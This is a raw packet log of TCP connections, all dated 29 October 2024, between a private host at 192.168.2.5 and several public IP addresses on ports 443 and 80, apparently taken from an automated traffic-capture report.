                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:35.942111015 CET60464443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:35.942327976 CET60464443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:35.942328930 CET60464443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:35.942354918 CET4436046413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:35.942370892 CET4436046413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:35.945111990 CET60470443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:35.945213079 CET4436047013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:35.945465088 CET60470443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:35.945745945 CET60470443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:35.945775032 CET4436047013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:35.969954014 CET4436046513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:35.971028090 CET60465443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:35.971028090 CET60465443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:35.971050978 CET4436046513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:35.971070051 CET4436046513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.092700958 CET4436046613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.093336105 CET60466443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.093359947 CET4436046613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.095879078 CET60466443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.095885992 CET4436046613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.103471041 CET4436046513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.103562117 CET4436046513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.104909897 CET60465443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.104909897 CET60465443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.105081081 CET60465443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.105097055 CET4436046513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.107719898 CET60471443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.107809067 CET4436047113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.108042955 CET60471443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.108042955 CET60471443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.108131886 CET4436047113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.144156933 CET4436046720.109.210.53192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.144416094 CET60467443192.168.2.520.109.210.53
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.145925999 CET60467443192.168.2.520.109.210.53
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.145946980 CET4436046720.109.210.53192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.146189928 CET4436046720.109.210.53192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.147789001 CET60467443192.168.2.520.109.210.53
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.148941040 CET4436046813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.149662018 CET60468443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.149662971 CET60468443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.149761915 CET4436046813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.149792910 CET4436046813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.191332102 CET4436046720.109.210.53192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.224083900 CET4436046613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.224164009 CET4436046613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.224456072 CET60466443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.224456072 CET60466443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.224456072 CET60466443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.227920055 CET60472443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.228002071 CET4436047213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.231091022 CET60472443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.231091976 CET60472443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.231163025 CET4436047213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.279395103 CET4436046813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.279481888 CET4436046813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.279607058 CET60468443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.279690981 CET60468443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.279690981 CET60468443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.279716969 CET4436046813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.279730082 CET4436046813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.284872055 CET60473443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.284964085 CET4436047313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.285180092 CET60473443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.285587072 CET60473443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.285619020 CET4436047313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.285887957 CET4436046720.109.210.53192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.293458939 CET60467443192.168.2.520.109.210.53
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.293458939 CET60467443192.168.2.520.109.210.53
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.293512106 CET4436046720.109.210.53192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.293648005 CET4436046720.109.210.53192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.293677092 CET4436046720.109.210.53192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.294363022 CET60467443192.168.2.520.109.210.53
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.401743889 CET4436046913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.402435064 CET60469443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.402455091 CET4436046913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.403006077 CET60469443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.403013945 CET4436046913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.442219973 CET60466443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.442292929 CET4436046613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.533855915 CET4436046913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.534015894 CET4436046913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.535718918 CET60469443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.535862923 CET60469443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.535862923 CET60469443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.535881042 CET4436046913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.535892010 CET4436046913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.542933941 CET60474443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.543041945 CET4436047413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.543147087 CET60474443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.543729067 CET60474443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.543762922 CET4436047413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.544629097 CET804976751.81.194.202192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.544698000 CET4976780192.168.2.551.81.194.202
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.677988052 CET4436047013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.721893072 CET60470443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.721961021 CET4436047013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.722336054 CET60470443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.722368002 CET4436047013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.842581987 CET4436047113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.848664999 CET4436047013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.848840952 CET4436047013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.849073887 CET60470443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.895499945 CET60471443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.925168037 CET60471443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.925177097 CET4436047113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.936377048 CET60471443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.936384916 CET4436047113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.936553001 CET60470443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.936619043 CET4436047013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.936651945 CET60470443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.936670065 CET4436047013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.968174934 CET4436047213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.993876934 CET60475443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.993985891 CET4436047513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.994102955 CET60475443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.994946957 CET60475443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.994978905 CET4436047513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.995166063 CET60472443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.995232105 CET4436047213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.995618105 CET60472443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:36.995630980 CET4436047213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.017960072 CET4436047313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.047734022 CET60473443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.047768116 CET4436047313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.048417091 CET60473443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.048430920 CET4436047313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.062571049 CET4436047113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.062813997 CET4436047113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.063112974 CET60471443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.063219070 CET60471443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.063219070 CET60471443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.063235044 CET4436047113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.063246965 CET4436047113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.066315889 CET60476443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.066425085 CET4436047613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.067080021 CET60476443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.067343950 CET60476443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.067383051 CET4436047613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.121108055 CET4436047213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.121175051 CET4436047213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.121278048 CET60472443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.173991919 CET4436047313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.174072981 CET4436047313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.174156904 CET60473443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.192317963 CET60472443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.192370892 CET4436047213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.192404032 CET60472443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.192420959 CET4436047213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.203926086 CET60473443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.203970909 CET4436047313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.204001904 CET60473443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.204020023 CET4436047313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.207007885 CET60477443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.207043886 CET4436047713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.207113981 CET60477443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.207305908 CET60477443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.207324982 CET4436047713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.207479954 CET60478443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.207524061 CET4436047813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.207593918 CET60478443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.207700968 CET60478443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.207720041 CET4436047813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.292771101 CET4436047413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.293365955 CET60474443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.293399096 CET4436047413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.294097900 CET60474443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.294110060 CET4436047413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.312258005 CET4976780192.168.2.551.81.194.202
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.312716007 CET6047980192.168.2.551.81.194.202
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.317687035 CET804976751.81.194.202192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.317986965 CET806047951.81.194.202192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.318072081 CET6047980192.168.2.551.81.194.202
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.321293116 CET6047980192.168.2.551.81.194.202
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.326762915 CET806047951.81.194.202192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.363861084 CET60480443192.168.2.552.149.20.212
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.363948107 CET4436048052.149.20.212192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.364048958 CET60480443192.168.2.552.149.20.212
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.364656925 CET60480443192.168.2.552.149.20.212
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.364690065 CET4436048052.149.20.212192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.424559116 CET4436047413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.424736977 CET4436047413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.424818039 CET60474443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.424968004 CET60474443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.425008059 CET4436047413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.425035000 CET60474443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.425049067 CET4436047413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.427819967 CET60481443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.427906990 CET4436048113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.428030014 CET60481443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.428183079 CET60481443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.428220034 CET4436048113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.731076002 CET4436047513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.731702089 CET60475443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.731754065 CET4436047513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.732178926 CET60475443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.732192039 CET4436047513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.839807034 CET4436047613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.840239048 CET60476443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.840300083 CET4436047613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.840730906 CET60476443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.840744972 CET4436047613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.861752033 CET4436047513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.861829042 CET4436047513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.861896038 CET60475443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.862066984 CET60475443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.862111092 CET4436047513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.862138987 CET60475443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.862153053 CET4436047513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.865211010 CET60482443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.865246058 CET4436048213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.865750074 CET60482443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.866375923 CET60482443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.866385937 CET4436048213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.951509953 CET4436047813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.952054977 CET60478443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.952086926 CET4436047813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.952467918 CET60478443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.952475071 CET4436047813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.954370022 CET4436047713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.954674959 CET60477443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.954695940 CET4436047713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.955041885 CET60477443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.955048084 CET4436047713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.976577997 CET4436047613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.976632118 CET4436047613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.976706982 CET4436047613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.976771116 CET60476443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.976906061 CET60476443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.976931095 CET4436047613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.976944923 CET60476443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.976953030 CET4436047613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.979968071 CET60483443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.979995966 CET4436048313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.980103970 CET60483443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.980279922 CET60483443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:37.980293036 CET4436048313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:38.024394989 CET806047951.81.194.202192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:38.024454117 CET6047980192.168.2.551.81.194.202
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:38.030175924 CET60484443192.168.2.551.81.194.202
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:38.030272007 CET4436048451.81.194.202192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:38.030358076 CET60484443192.168.2.551.81.194.202
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:38.030781031 CET60484443192.168.2.551.81.194.202
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:38.030817032 CET4436048451.81.194.202192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:38.088454008 CET4436047713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:38.088573933 CET4436047713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:38.088588953 CET4436047813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:38.088639021 CET60477443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:38.088833094 CET60477443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:38.088871002 CET4436047713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:38.088917971 CET60477443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:38.088933945 CET4436047713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:38.090661049 CET4436047813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:38.090720892 CET4436047813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:38.090722084 CET60478443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:38.090789080 CET60478443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:38.090893984 CET60478443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:38.090893984 CET60478443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:38.090918064 CET4436047813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:38.090938091 CET4436047813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:38.091914892 CET60485443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:38.092016935 CET4436048513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:38.092089891 CET60485443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:38.092226028 CET60485443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:38.092250109 CET4436048513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:38.093007088 CET60486443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:38.093058109 CET4436048613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:38.093261957 CET60486443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:38.093378067 CET60486443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:38.093405962 CET4436048613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:38.185058117 CET4436048113.107.246.45192.168.2.5
